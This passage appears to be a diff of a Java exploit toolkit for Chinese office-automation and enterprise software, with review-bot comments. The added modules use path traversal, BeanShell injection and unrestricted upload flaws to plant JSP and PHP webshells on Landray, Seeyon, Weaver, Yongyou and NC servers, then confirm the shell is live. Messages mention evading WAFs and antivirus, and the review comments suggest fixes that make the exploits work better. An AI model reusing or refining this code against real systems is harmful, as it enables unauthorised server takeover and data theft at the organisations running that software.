+ String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhuda.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+ String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters="+ t1 +"";
+
+ Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/loginzhuda.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 shell文件写入成功 \n " + url + "/loginzhuda.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n getshell失败!!!waf查杀!!!请进行免杀!!!!!");
+ });
+ return false;
+ }
+ }
+
+
+}
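Review bot: `sun.misc.BASE64Encoder` (L617, L641, L666) is an internal JDK API that was removed in JDK 9+, so this class will not compile on a current JDK; use `java.util.Base64.getEncoder().encodeToString(bytes)`, which also yields a single line — `encodeBuffer` inserts a line break every 76 characters plus a trailing newline, the `.trim()` at L641 strips only the ends, and `shell()` at L666 does not trim at all, so the BeanShell string literal can carry embedded newlines and relies on the server-side `decodeBuffer` tolerating them. `getBytes()` at L641 and L666 uses the platform charset; pass `StandardCharsets.UTF_8` so the written JSP matches the template regardless of the tester's locale. The success check at L672 looks for `shell.test_payload` in the served JSP; the template at `shell.Jsppath` is not in this diff, so confirm an executed page really contains that marker.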
diff --git a/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java b/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
new file mode 100644
index 0000000..6945884
--- /dev/null
+++ b/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
@@ -0,0 +1,43 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class seeyon_testsqli implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url,textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 该漏洞暂不支持getshell 请手动利用");
+ });
+ return false;
+ }
+
+ private boolean att(String url , TextArea textArea){
+ Response response = HttpTools.get(url + "/yyoa/common/js/menu/test.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞页面存在 请自行查看是否存在注入");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n seeyon_testsqli-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+
+}
+
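Review bot: `att` treats any HTTP 200 from `/yyoa/common/js/menu/test.jsp` as "page exists" (L719), so a deployment with a catch-all route, an SPA shell or a custom 200 error page yields a false positive; add a body check for a marker specific to that page before returning true, e.g. `if (response.getCode() == 200 && response.getText().contains("<marker>"))`. The "not vulnerable" message at L726 labels this check `-RCE`, while the README entry and the success message describe it as SQL-injection page detection; align the text. The method only reports that the endpoint is reachable, not a confirmed injection, so the success message is right to say "请自行查看" and `checkVul` returning `true` should be read accordingly.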
diff --git a/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java b/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
new file mode 100644
index 0000000..6f07617
--- /dev/null
+++ b/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
@@ -0,0 +1,77 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class seeyonreport_svg_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyonreport/WebReport/nishizhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n seeyonoa_seeyonreport_upload-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/seeyonreport/WebReport/nishidazhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+}
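Review bot: `shell` uploads `nishidazhu.svg.jsp` (L795) yet verifies `nishizhu.svg.jsp` (L798), the file `att` created, so it reports a webshell as written on the strength of the earlier check artifact; change L798 to `url + "/seeyonreport/WebReport/nishidazhu.svg.jsp"`. The JSON payload at L767 and L794 escapes only `"`; a backslash or newline in the JSP template yields invalid JSON, so escape `\\` and control characters as well or use a JSON library. The non-200 branch at L810–L814 prints the AV-blocked message where `att` prints "not vulnerable" for the same response, so the two methods disagree about what a rejected request means.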
diff --git a/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java b/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
new file mode 100644
index 0000000..9556aff
--- /dev/null
+++ b/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
@@ -0,0 +1,107 @@
+package exp.oa.weaveroa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class weaveroa_eoffice8_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ Boolean pay1 = pay1(url, textArea);
+ return pay1;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Boolean shell = shell(url, textArea);
+ return shell;
+ }
+
+ private Boolean pay1(String url, TextArea textArea) {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+ String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhu.php4\"\n" +
+ "Content-Type: application/octet-stream\n" +
+ "\n" +
+ shell.readFile(shell.Testpath) + "\n" +
+ "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+ Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+
+ try {
+ String uri1 = post.getText().split("\\*")[0];
+ String uri2 = post.getText().split("\\*")[1];
+
+
+ String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+ Response response = HttpTools.get(geturl, new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 测试文件写入成功 \n " + geturl
+ );
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+
+
+ }
+
+ private Boolean shell(String url, TextArea textArea) {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+ String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhuda.php4\"\n" +
+ "Content-Type: application/octet-stream\n" +
+ "\n" +
+ shell.readFile(shell.Phppath) + "\n" +
+ "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+ Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+ String uri1 = post.getText().split("\\*")[0];
+ String uri2 = post.getText().split("\\*")[1];
+
+ String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+ Response response = HttpTools.get(geturl, new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 shell文件写入成功 \n " + geturl
+ );
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 疑似waf查杀,请手动测试"
+ );
+ });
+ return false;
+ }
+ }
+
+
+}
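Review bot: `shell` indexes `post.getText().split("\\*")[1]` (L908–L909) without the try/catch that `pay1` has at L862–L891, so an upload response with no `*` in it (error page, WAF block, empty body) throws `ArrayIndexOutOfBoundsException` — or `NullPointerException` if `getText()` is null — out of the JavaFX handler instead of printing a failure; split once into `String[] parts = post.getText().split("\\*");`, check `if (parts.length < 2) { /* report failure */ return false; }`, and only then build `geturl`. The multipart body joins its parts with `\n` (L852–L857, L899–L904) where RFC 2046 requires CRLF; PHP's parser may accept LF, but sending `\r\n` removes that assumption. Both methods leave a `.php4` file under `/attachment/<uri1>/<uri2>` on the server, so the success message should remind the tester to delete it.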
diff --git a/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java b/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
new file mode 100644
index 0000000..3ce45d8
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
@@ -0,0 +1,60 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+
+public class yongyou_KSOA_Attachmentupload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Disposition","application/x-msdownload; ");
+ Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.txt", shell.test_payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/pictures/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(()->{
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/nishizhu.txt");
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n yongyou_KSOA_Attachmentupload-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=---------------------------122739796041499160471980406311");
+ Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.jsp", shell.readFile(shell.Jsppath), head, "utf-8");
+ Response response = HttpTools.get(url + "/pictures/nishizhu.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(()->{
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n" + url + "/nishizhu.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n waf拦截!!!请手动复现!!!");
+ });
+ return false;
+ }
+ }
+
+}
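Review bot: The success messages on L968 and L986 print `url + "/nishizhu.txt"` and `url + "/nishizhu.jsp"`, but the file is actually verified at `url + "/pictures/nishizhu.txt"` (L965) and `url + "/pictures/nishizhu.jsp"` (L983), so the operator is handed a path that was never checked. Build the path once, e.g. `String path = url + "/pictures/nishizhu.jsp";`, and use it for both the GET and the message. Separately, L963 puts a MIME type under a `Content-Disposition` header, which looks like it was meant to be `Content-Type` as in shell(), and the upload response `post` is never inspected in either method, so a rejected upload is only inferred indirectly from the follow-up GET.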
diff --git a/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java b/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
new file mode 100644
index 0000000..2eb81f7
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
@@ -0,0 +1,87 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class yongyou_U8_AppProxy implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url,textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url,textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+ String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+ "Content-Type: image/png\n" +
+ "\n" +
+ "<% out.println(\"" + shell.test_payload + "\");%>\n" +
+ "--59229605f98b8cf290a7b8908b34616b--";
+
+ Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap(), "utf-8");
+
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在,测试文件写入成功 " + url + "/hello_U8.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n yongyou_U8_AppProxy-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+ String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+ "Content-Type: image/png\n" +
+ "\n" +
+ "<% out.println(\"" + shell.readFile(shell.Jsppath) + "\");%>\n" +
+ "--59229605f98b8cf290a7b8908b34616b--";
+
+ Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap(), "utf-8");
+
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在,webshell文件写入成功 " + url + "/hello_U8.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n waf拦截!!!请手动复现!!!");
+ });
+ return false;
+ }
+ }
+
+
+
+}
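Review bot: shell() on L1066 embeds `shell.readFile(shell.Jsppath)` inside `<% out.println("…");%>`, so whatever that file holds is uploaded as a string literal rather than as executable JSP; if Jsppath is a JSP webshell, as its name and the sibling modules suggest, the resulting page will either fail to compile on the unescaped quotes or merely print the shell source. The wrapper is right for att()'s marker, but the shell variant should send the file body unwrapped, `"\n" + shell.readFile(shell.Jsppath) + "\n" +`, the way L982 and L1204 do. The upload result `post` is also discarded in both methods, so a non-2xx response from `/U8AppProxy` is never reported and the failure surfaces only as a misleading "waf拦截" message.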
diff --git a/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java b/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
index d1a6813..caf912f 100644
--- a/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
@@ -35,7 +35,7 @@ public class yongyou_chajet_upload implements Exploitlnterface {
Response post = HttpTools.post(url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1", fir_post, this.headers, "utf-8");
if (post.getCode() == 200) {
Response response = HttpTools.get(url + "/tplus/SM/SetupAccount/images/" + filename, new HashMap(), "utf-8");
- if (response.getText().contains(shell.test_payload)) {
+ if (response.getText() != "" && response.getText().contains(shell.test_payload)) {
Platform.runLater(() -> {
textArea.appendText("\n 漏洞存在,测试文件写入成功 \n地址为:" + url + "/tplus/SM/SetupAccount/images/" + filename);
});
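Review bot: The added guard `response.getText() != ""` on L1100 compares String references, so it is true for any non-interned string and filters nothing; the intent, avoiding a NullPointerException when `getText()` returns null, is not met. Use `response.getText() != null && response.getText().contains(shell.test_payload)` (an empty string already fails `contains`, so no separate emptiness check is needed). The enclosing method starts and ends outside the hunk.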
diff --git a/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java b/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
new file mode 100644
index 0000000..2ad052b
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
@@ -0,0 +1,122 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class yongyou_nc_uploadServlet implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea) {
+ try {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data;");
+ HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+ coon.setRequestMethod("POST");
+ coon.setDoOutput(true);
+ coon.setDoInput(true);
+ coon.setUseCaches(false);
+
+ for (String key : head.keySet()) {
+ coon.setRequestProperty(key, head.get(key));
+ }
+ OutputStream outputStream = coon.getOutputStream();
+ ObjectOutputStream out = new ObjectOutputStream(outputStream);
+ Map metaInfo = new HashMap();
+ metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+ metaInfo.put("FILE_NAME", "nishizhu.txt");
+ out.writeObject(metaInfo);
+ outputStream.write(shell.test_payload.getBytes());
+ out.flush();
+ out.close();
+ outputStream.close();
+ HttpTools.getResponse(coon, "utf-8");
+
+ Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap(), "utf-8");
+ if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+ textArea.appendText("\n 连接异常!!!");
+ });
+ }
+ return false;
+ }
+
+ private Boolean shell(String url, TextArea textArea) {
+
+ try {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data;");
+ HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+ coon.setRequestMethod("POST");
+ coon.setDoOutput(true);
+ coon.setDoInput(true);
+ coon.setUseCaches(false);
+
+ for (String key : head.keySet()) {
+ coon.setRequestProperty(key, head.get(key));
+ }
+ OutputStream outputStream = coon.getOutputStream();
+ ObjectOutputStream out = new ObjectOutputStream(outputStream);
+ Map metaInfo = new HashMap();
+ metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+ metaInfo.put("FILE_NAME", "nishizhu.jsp");
+ out.writeObject(metaInfo);
+ outputStream.write(shell.readFile(shell.Jsppath).getBytes());
+ out.flush();
+ out.close();
+ outputStream.close();
+ HttpTools.getResponse(coon, "utf-8");
+
+ Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<>(), "utf-8");
+ if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n shell被查杀 请免杀!!!!!!!!");
+ });
+ return false;
+ }
+
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 连接异常!!!");
+ });
+ }
+ return false;
+ }
+
+}
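Review bot: `head` is declared as a raw `HashMap` (L1139, L1187) and then iterated with `for (String key : head.keySet())`; on a raw map the element type is Object, which javac rejects for a String loop variable, and `head.get(key)` is likewise Object where `setRequestProperty` wants a String. Declare it `Map<String, String> head = new HashMap<>();`, since `java.util.Map` is already imported on L1123. The ObjectOutputStream and the connection OutputStream are also closed only on the happy path; wrapping L1150–L1159 in a try-with-resources keeps an exception mid-write from leaking the stream. Both catch blocks discard `e`, so the operator sees only "连接异常" with no cause; append `e.getMessage()` to the message or log it.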
diff --git a/src/main/java/utils/Kinds_Exp.java b/src/main/java/utils/Kinds_Exp.java
index 5706770..c41bfce 100644
--- a/src/main/java/utils/Kinds_Exp.java
+++ b/src/main/java/utils/Kinds_Exp.java
@@ -1,17 +1,18 @@
package utils;
import core.Exploitlnterface;
+import exp.cms.nacos_Creatuser;
+import exp.equipment.h3c.cas_cvm_upload;
import exp.equipment.hikvision.hik_applyCT_fastjson;
import exp.equipment.qianxin.ngfw_waf_router;
import exp.equipment.wangyu.Leadsec_ACM_account;
import exp.middleware.iis.iis_put_rce;
+import exp.oa.fanruan.fanruan_save_svg;
import exp.oa.landrayoa.landray_datajson;
+import exp.oa.landrayoa.landray_fileupload_sysSearch;
import exp.oa.landrayoa.landray_sysSearchMain;
import exp.oa.landrayoa.landray_treexmlTmpl;
-import exp.oa.seeyonoa.seeyonoa_ajaxBypass;
-import exp.oa.seeyonoa.seeyonoa_htmlofficeservlet;
-import exp.oa.seeyonoa.seeyonoa_main_log4j2;
-import exp.oa.seeyonoa.seeyonoa_wpsAssistServlet;
+import exp.oa.seeyonoa.*;
import exp.oa.tongdaoa.tongdaoa_apiali;
import exp.oa.tongdaoa.tongdaoa_getdata;
import exp.oa.wanhuoa.wanhu_DocumentEdit;
@@ -19,15 +20,7 @@ import exp.oa.wanhuoa.wanhuoa_OfficeServer;
import exp.oa.wanhuoa.wanhuoa_Officeserverservlet;
import exp.oa.wanhuoa.wanhuoa_fileUploadController;
import exp.oa.wanhuoa.wanhuoa_smartUpload;
-import exp.oa.weaveroa.weaveroa_BshServlet;
-import exp.oa.weaveroa.weaveroa_KtreeUploadAction;
-import exp.oa.weaveroa.weaveroa_WorkflowServiceXml;
-import exp.oa.weaveroa.weaveroa_doExecl;
-import exp.oa.weaveroa.weaveroa_eoffice10_OfficeServer;
-import exp.oa.weaveroa.weaveroa_mobile6_sqlli;
-import exp.oa.weaveroa.weaveroa_office_UploadFile;
-import exp.oa.weaveroa.weaveroa_page_uploadOperation;
-import exp.oa.weaveroa.weaveroa_workrelate_uploadOperation;
+import exp.oa.weaveroa.*;
import exp.oa.yongyou.*;
import java.util.ArrayList;
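Review bot: Replacing the explicit seeyonoa and weaveroa imports with `exp.oa.seeyonoa.*` and `exp.oa.weaveroa.*` (L1254, L1271) is a style regression for a dispatcher like this one: with three wildcard packages now in scope (`exp.oa.yongyou.*` was already one), a same-named class in two packages becomes an ambiguity error at the use site, and the import block no longer shows which exploit modules this file wires up. Keep the explicit list and add only the classes the new dispatch branches need: `import exp.oa.seeyonoa.seeyonreport_svg_upload;`, `import exp.oa.seeyonoa.seeyon_testsqli;` and `import exp.oa.weaveroa.weaveroa_eoffice8_upload;`.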
@@ -70,6 +63,7 @@ public class Kinds_Exp {
kindList.add("OA");
kindList.add("安全设备");
kindList.add("中间件");
+ kindList.add("CMS");
return kindList;
}
@@ -82,6 +76,7 @@ public class Kinds_Exp {
oa.add("万户-OA");
oa.add("致远-OA");
oa.add("通达-OA");
+ oa.add("帆软-OA");
return FXCollections.observableArrayList(oa);
}
@@ -96,12 +91,19 @@ public class Kinds_Exp {
public static ObservableList equipment() {
ArrayList equipment = new ArrayList<>();
equipment.add("海康");
+ equipment.add("H3C");
equipment.add("深信服");
equipment.add("网御星云");
equipment.add("奇安信");
return FXCollections.observableArrayList(equipment);
}
+ public static ObservableList cms() {
+ ArrayList equipment = new ArrayList<>();
+ equipment.add("Alibaba");
+ return FXCollections.observableArrayList(equipment);
+ }
+
/*---------------------OA系列-------------------------*/
//泛微oa
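Review bot: The new `cms()` method (L1298–L1302) builds its list in a local named `equipment`, a copy-paste leftover from `equipment()` just above that misleads anyone reading the vendor dispatch; rename it, e.g. `ArrayList<String> cms = new ArrayList<>();` and `return FXCollections.observableArrayList(cms);`. Typing the list `ArrayList<String>` instead of the raw `ArrayList` its siblings use also lets the compiler catch a non-String entry.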
@@ -114,6 +116,7 @@ public class Kinds_Exp {
expList.add("e-cology BshServlet-RCE");
expList.add("e-cology KreeUploadAction-RCE");
expList.add("e-office logo_UploadFile.php-RCE");
+ expList.add("e-office8 upload.php-RCE");
expList.add("e-office10 OfficeServer.php-RCE");
expList.add("e-office doexcel.php-RCE");
expList.add("e-mobile_6.6 messageType.do-SQlli");
@@ -127,6 +130,14 @@ public class Kinds_Exp {
expList.add("landray_sysSearchMain.do-RCE");
expList.add("landray_treexmlTmpl-RCE");
expList.add("landray_datajson-RCE");
+ expList.add("landray_fileupload_sysSearch-RCE");
+ return FXCollections.observableArrayList(expList);
+ }
+
+ public ObservableList fanruan(){
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("fanruan-design_save_svg-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -138,8 +149,11 @@ public class Kinds_Exp {
expList.add("NC_bsh.servlet.BshServlet-RCE");
expList.add("NC_NCFindWeb-Directory");
expList.add("NC_FileReceiveServlet-RCE");
+ expList.add("NC_UploadServlet-RCE");
expList.add("GRP_U8_UploadFileData-RCE");
+ expList.add("GRP_U8_AppProxy-RCE");
expList.add("KSOA_ImageUpload-RCE");
+ expList.add("KSOA_Attachmentupload-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -160,9 +174,11 @@ public class Kinds_Exp {
expList = new ArrayList<>();
expList.add("All");
expList.add("seeyonoa_main_log4j2-RCE");
+ expList.add("seeyonoa_seeyonreport_upload-RCE");
expList.add("seeyonoa_wpsAssisServlet-RCE");
expList.add("seeyonoa_htmlofficeservlet-RCE");
expList.add("seeyonoa_ajaxBypass-RCE");
+ expList.add("seeyon_testsqli-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -196,6 +212,13 @@ public class Kinds_Exp {
return FXCollections.observableArrayList(expList);
}
+ public ObservableList h3c() {
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("cas_cvm云计算管理平台-RCE");
+ return FXCollections.observableArrayList(expList);
+ }
+
//奇安信
public ObservableList qianxin() {
expList = new ArrayList<>();
@@ -211,6 +234,15 @@ public class Kinds_Exp {
return FXCollections.observableArrayList(expList);
}
+ /*---------------------CMS-------------------------*/
+
+ public ObservableList Alibaba() {
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("nacos任意用户添加");
+ return FXCollections.observableArrayList(expList);
+ }
+
public ObservableList defaultList() {
expList = new ArrayList<>();
expList.add("All");
